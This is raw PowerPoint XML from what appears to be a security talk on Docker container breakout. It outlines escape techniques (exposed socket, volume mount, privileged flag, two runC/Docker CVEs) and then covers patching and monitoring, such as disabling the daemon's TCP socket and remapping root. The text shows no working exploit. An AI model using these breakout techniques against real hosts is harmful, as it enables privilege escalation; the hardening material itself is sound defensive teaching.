            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217477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59FBB733-9887-D4A6-6351-09E7DC76D3E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2067400" y="472965"/>
            <a:ext cx="7701074" cy="5735529"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2E99CFC-3809-C59A-66F4-87A8B98E8418}"/>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9E71C94C-9618-8A0C-F5BE-AA1395AA5C0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2866851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a:xfrm>
            <a:off x="838200" y="197037"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>Outline</a:t>
            </a:r>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838200" y="1248352"/>
            <a:ext cx="10515600" cy="4855602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Container </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Breakout</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SA" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Examples: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker socket misconfigurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege escalation using Volume Mount</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Container escape using the exposed socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Container attack using privileged flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>CVE-2019-13139 - Docker build code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2024-21626 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Escape Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA" sz="2400"/>
              <a:t>Security Application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Patching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Docker socket misconfigurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Privilege escalation using Volume Mount</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Container escape using the exposed socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Container attack using privileged flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
              </a:rPr>
              <a:t>CVE-2019-13139 - Docker build code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>CVE-2024-21626 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1"/>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t> Escape Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Security Monitoring Application: Key Ideas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Security Monitoring Application: Architecture Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Examples of Analyzing Breakout Vulnerabilities</a:t>
            </a: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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3606226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 </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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1124145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Docker socket misconfigurations</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indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Disable TCP socket </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> parameter in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/system/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>docker.service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="System Font Regular"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ExecStart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/bin/docker daemon -H </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" u="none" strike="sngStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-H </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" u="none" strike="sngStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" u="none" strike="sngStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" u="none" strike="sngStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>X.X.X.X:xxxx</a:t>
            </a:r>
            <a:endParaRPr lang="ar-SA" sz="3200" strike="sngStrike"/>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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41986" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20E73357-25AF-42C4-33DD-790E6196F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44985"/>
            <a:ext cx="79248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00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Docker socket misconfigurations</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indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44034" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8CA2C6E-4D6D-A6D5-B9AE-721CDA196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11350"/>
            <a:ext cx="7924800" cy="303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65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Docker socket misconfigurations</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r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Confirm the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> unauthorized access to the API is denied</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="0" u="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA0736C6-1ED0-BE61-F295-65B89A9AB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48" y="2730500"/>
            <a:ext cx="7924800" cy="69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5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1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker socket misconfigurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3137096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5593-AA7B-05A2-1567-E57D654CBAD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>Privilege escalation using Volume Mount</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B249376-AD02-AA32-828C-869F6F413730}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ap the root user on the host</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2E57E50-F626-C046-01EE-EEFA6B3D9C1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64B52164-2CEA-76B9-865F-D4006FB84DDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48130" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2457D8D3-497F-FF89-42D5-88F03D4D6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0" y="2470150"/>
            <a:ext cx="71755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1F3626F0-BEBA-DEFB-5121-01711B52D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0" y="4608782"/>
            <a:ext cx="71755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53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5593-AA7B-05A2-1567-E57D654CBAD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>Privilege escalation using Volume Mount</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B249376-AD02-AA32-828C-869F6F413730}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Remove all the existing docker images. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Create a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>daemon.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or edit the file in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/docker/ folder.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
